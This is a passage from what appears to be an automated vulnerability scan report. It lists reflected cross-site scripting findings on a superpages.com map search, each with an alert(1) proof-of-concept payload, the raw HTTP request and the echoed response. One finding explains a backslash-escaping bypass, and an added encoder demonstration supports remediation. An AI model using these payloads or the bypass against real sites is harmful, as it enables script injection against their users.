Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415ee"%3balert(1)//7f39f412a8d was submitted in the C parameter. This input was echoed as 415ee";alert(1)//7f39f412a8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks415ee"%3balert(1)//7f39f412a8d&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=C1BB2C6D5F2026531BC42BC6B8F4DFAC; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:22:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
yFJXQWMj1bvQ2";

var spHeader=false;
var cobrand="comlocal1a";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="banks415ee";alert(1)//7f39f412a8d";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
var spCampaignId2="";
var singleQuery2="";
var spType2="";
var spOnAMap2=null;
var spC2="";
var spZoom=4;
var spStyle="r";
var spD
...[SNIP]...

1.197. http://mapserver.superpages.com/mapbasedsearch/ [CS parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the CS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5aa7"-alert(1)-"e8f7aa23d76 was submitted in the CS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7"-alert(1)-"e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.198. http://mapserver.superpages.com/mapbasedsearch/ [L parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the L request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbefb"%3balert(1)//638e573e1c7 was submitted in the L parameter. This input was echoed as bbefb";alert(1)//638e573e1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101bbefb"%3balert(1)//638e573e1c7&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=0455C57151DFDC39EEC6EB920F1CE002; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
S2=false;
var spLid2="";
var spBid2="";
var spCampaignId2="";
var singleQuery2="";
var spType2="";
var spOnAMap2=null;
var spC2="";
var spZoom=4;
var spStyle="r";
var spDD = false;
var spAddress="19101bbefb";alert(1)//638e573e1c7";
var spStartAddress="";
var spTraffic = false;
var spBeId = false;
var spLat = null;
var spLon = null;
var spStartLocation = true;

var spc_lat = null;
var spc_long = null;
...[SNIP]...

1.199. http://mapserver.superpages.com/mapbasedsearch/ [MCBP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the MCBP request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fed48"-alert(1)-"1cd3186e2fd was submitted in the MCBP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F434BBA89E81451FADCF2C4BAF96B9DD; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
eturning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=truefed48"-alert(1)-"1cd3186e2fd&C=Banks&STYPE=S&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.200. http://mapserver.superpages.com/mapbasedsearch/ [PS parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the PS request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242c7"-alert(1)-"6e00a234b00 was submitted in the PS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=9139837C423FB41FB7994B9F30753C27; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
ed
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15242c7"-alert(1)-"6e00a234b00&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.201. http://mapserver.superpages.com/mapbasedsearch/ [SRC parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e454"%3balert(1)//a5898f77f83 was submitted in the SRC parameter. This input was echoed as 1e454";alert(1)//a5898f77f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&spheader=true&L=&SRC=bpo1e454"%3balert(1)//a5898f77f83 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=117A4533D55B610A1C95579E212D0972; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
window.locale = 'en-us';
var token = "p3QTbbHsCs-eeUFhvWJsTUVffL_Ir8TWNCsd-WpPTj7F6jKZTdTbkF_H-pfUpTkqszv1R7ui7FAHG-ONafiS_w2";

var spHeader=true;
var cobrand="bpo1e454";alert(1)//a5898f77f83";
var spYPC="";
var spPGID="";
var spOF="";
var spLid="";
var spBid="";
var spCampaignId="";
var spOnAMap=false;
var spC="";
var TopMostSW=false;
var spMS2=false;
var spLid2="";
var spBid2="";
var spC
...[SNIP]...

1.202. http://mapserver.superpages.com/mapbasedsearch/ [STYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the STYPE request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc58"-alert(1)-"d4e5aaa0292 was submitted in the STYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=7AD460510827A183B38F52F6C40DBEE4; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S3bc58"-alert(1)-"d4e5aaa0292&PS=15&search=Find+It";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.203. http://mapserver.superpages.com/mapbasedsearch/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 486fb"-alert(1)-"cf09a8c6088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=F0CC14DC558B2EE853A42B486D028978; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:23:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
var spc_long = null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?486fb"-alert(1)-"cf09a8c6088=1";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.204. http://mapserver.superpages.com/mapbasedsearch/ [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the search request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9334"-alert(1)-"340f60da8f8 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8 HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_lastvisit=1296748870245; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=48CA725AE0BF7A03BE6E941C2CF30885; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:24:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
ferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+Itc9334"-alert(1)-"340f60da8f8";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.205. http://mapserver.superpages.com/mapbasedsearch/ [spheader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/

Issue detail

The value of the spheader request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9124c"-alert(1)-"2c2736523e0 was submitted in the spheader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L= HTTP/1.1
Host: mapserver.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=78A519C6EB88961EA09FA2CFC9F74D50; __unam=c5114f2-12dec4b1cc4-7f15d273-1; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; s_dfa=superpagescom; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; shopping=; s.campaign=comlocal1a; s_pv=Maps;

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=762E206D0334242828CD0BC99ACC410B; Path=/mapbasedsearch
Set-Cookie: spLocalHost=http://mapserver.superpages.com/mapbasedsearch/
Content-Type: text/html
Date: Thu, 03 Feb 2011 19:07:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>
<meta http
...[SNIP]...
= null;
// TEST: that this is returning what's expected
           var spReferer = false;
           var spDomain = "superpages.com";

           var spUrl = "http://mapserver.superpages.com/mapbasedsearch/?spheader=true9124c"-alert(1)-"2c2736523e0&L=";

           var fbRedirectUri = "http://yellowpages.superpages.com/Facebook?prev=map";

           var fbClientId = "133515049997773";

</script>
...[SNIP]...

1.206. http://mapserver.superpages.com/mapbasedsearch/spSearchProxyLight [FP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/spSearchProxyLight

Issue detail

The value of the FP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bf14\'%3balert(1)//32bd7f650df was submitted in the FP parameter. This input was echoed as 5bf14\\';alert(1)//32bd7f650df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, before the quotation marks are escaped.
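For the JavaScript-string findings on this host (1.194 through 1.205, where request values land in var cobrand="..." and var spUrl="...") and for the backslash bypass described in this finding, the following added example (not code from the report or from superpages.com) puts three of the reflected values through three encoders and executes each resulting script with alert() stubbed, so the outcome is observed rather than argued. The encoders are assumptions: the report shows only the reflected output, not the server code.

```javascript
// Added example, not part of the CloudScan report: what happens when a request
// parameter lands in a quoted JavaScript string under three encoders.

// 1. No encoding, as seen in var cobrand="..." and var spUrl="...".
const noEncoding = (s) => s;

// 2. Quote-only escaping, the defence 1.206 describes: a backslash goes in
//    front of each quote, but a backslash already in the input is left alone.
const escapeQuotesOnly = (s) => s.replace(/['"]/g, (c) => '\\' + c);

// 3. Encode every character that can affect the JS literal or the enclosing
//    HTML: backslash, both quotes, < > / (so "</script>" cannot close the
//    block) and line terminators. \uXXXX is valid inside any JS string literal.
function jsStringEncode(s) {
  return s.replace(/[\\'"<>\/\r\n\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Build the script line the server would emit.
function renderAssignment(quote, value, encoder) {
  return 'var fp = ' + quote + encoder(value) + quote + ';';
}

// Run the generated script with alert() stubbed. Returns whether alert fired
// and what fp ended up holding (undefined if the script did not even parse).
function execute(script) {
  let fired = false;
  const alert = () => { fired = true; };
  try {
    const fp = new Function('alert', script + '\nreturn fp;')(alert);
    return { fired, value: fp };
  } catch (e) {
    return { fired, value: undefined };
  }
}

// Three reflected values from the report, each with the quoting the page used.
// The third carries its own backslash: it is built for a quote-escaping defence.
const CASES = {
  semicolonComment: { quote: '"', value: 'comlocal1ae0186";alert(1)//4a2e6a0ce5b' }, // 1.194
  arithmetic:       { quote: '"', value: 'trueb305f"-alert(1)-"5b1a94486f6' },        // 1.195
  backslashBypass:  { quote: "'", value: "map5bf14\\';alert(1)//32bd7f650df" },       // 1.206
};

const ENCODERS = { noEncoding, escapeQuotesOnly, jsStringEncode };

// Every encoder against every case: { encoder: { case: { fired, value } } }.
function demo() {
  const out = {};
  for (const [encName, enc] of Object.entries(ENCODERS)) {
    out[encName] = {};
    for (const [caseName, c] of Object.entries(CASES)) {
      out[encName][caseName] = execute(renderAssignment(c.quote, c.value, enc));
    }
  }
  return out;
}

console.log(JSON.stringify(demo(), null, 2));
```

Two results are instructive. Quote-only escaping stops the `";alert(1)//` and `"-alert(1)-"` payloads but not the one carrying its own backslash, which is exactly the bypass described above; and that same backslash payload does nothing against a page with no escaping at all, because there `\'` is simply an escaped quote, which is why the scanner chose a different payload for each context. Full encoding of backslash, quotes, `<`, `>`, `/` and line terminators returns the original value to the script unchanged and fires nothing; encoding `/` and `<` also matters because the HTML parser ends a script block at `</script` regardless of where the JavaScript string stands.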

Request

GET /mapbasedsearch/spSearchProxyLight?app=sp&sw=1&i=1&a=banks&c=39.954484&d=-75.182068&r=1.010325&ppc=1&pi=0&FP=map5bf14\'%3balert(1)//32bd7f650df&cpc=true&SRC=MapBased HTTP/1.1
Host: mapserver.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; web=; shopping=; yp=; s_lastvisit=1296751078074; s_cc=true; s.campaign=comlocal1a; s_pv=Maps; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 18:58:34 GMT
Content-Length: 22659

SP_SearchManager._ApplyResults(1,0,[new SP_SearchResult('2201547790','Rittenhouse Square - M&T Bank','117 S 18th St, Philadelphia, PA 19103','(215) 665-1509','std','yp',39.950997, -75.170329,null,null,null,'US',true,0.8,false,null,null,'','',false,'www.mtb.com','http://clicks.superpages.com/ct/clickThrough?SRC=MapBased&target=SP&PN=1&FP=map5bf14\\';alert(1)//32bd7f650df&C=banks&PGID=yp257.8083.1296759515356.165406242&TS=nbt&ACTION=log,red&LID=2201547790&TR=77&bidType=FLCLIK&relativePosition=0&position=0&PGSN=E0&RS=96&FL=url&TL=off&LOC=http://www.tomtracker.com/redire
...[SNIP]...

1.207. http://mapserver.superpages.com/mapbasedsearch/spSearchProxyLight [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mapserver.superpages.com
Path:   /mapbasedsearch/spSearchProxyLight

Issue detail

The value of the a request parameter is copied into the HTML document as plain text between tags. The payload f2f57<script>alert(1)</script>151fa128c48 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that this response is not an HTML page but a JavaScript call (SP_SearchManager._ApplyResults) whose last argument is an HTML fragment carried in a double-quoted string, and it is sent with no Content-Type header; the payload contains no quote characters, so it stays inside that string, and whether the script tag executes depends on how the page that fetches this endpoint renders the fragment.

Request

GET /mapbasedsearch/spSearchProxyLight?app=sp&sw=1&i=1&a=banksf2f57<script>alert(1)</script>151fa128c48&c=39.954484&d=-75.182068&r=1.010325&ppc=1&pi=0&FP=map&cpc=true&SRC=MapBased HTTP/1.1
Host: mapserver.superpages.com
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1a&C=banks&L=19101&CS=La5aa7%22-alert(1)-%22e8f7aa23d76&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8A6B3D73FBEBC1BA5FD4B23D5F55C05E; spLocalHost=http://mapserver.superpages.com/mapbasedsearch/; SPC=1296748823650-www.superpages.com-30323935-794472; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; __unam=c5114f2-12dec4b1cc4-7f15d273-1; web=; shopping=; yp=; s_lastvisit=1296751078074; s_cc=true; s.campaign=comlocal1a; s_pv=Maps; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D; s_ppv=100

Response

HTTP/1.1 200 OK
Server: Unspecified
Content-Length: 637
Date: Thu, 03 Feb 2011 18:57:38 GMT

SP_SearchManager._ApplyResults(1,0,[],[],false,"<div class=message>No 'banksf2f57<script>alert(1)</script>151fa128c48' found on this map.<br><br><div class=solution>Try these solutions<br><br><span cl
...[SNIP]...

1.208. http://mortgage.ocregister.com/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /

Issue detail

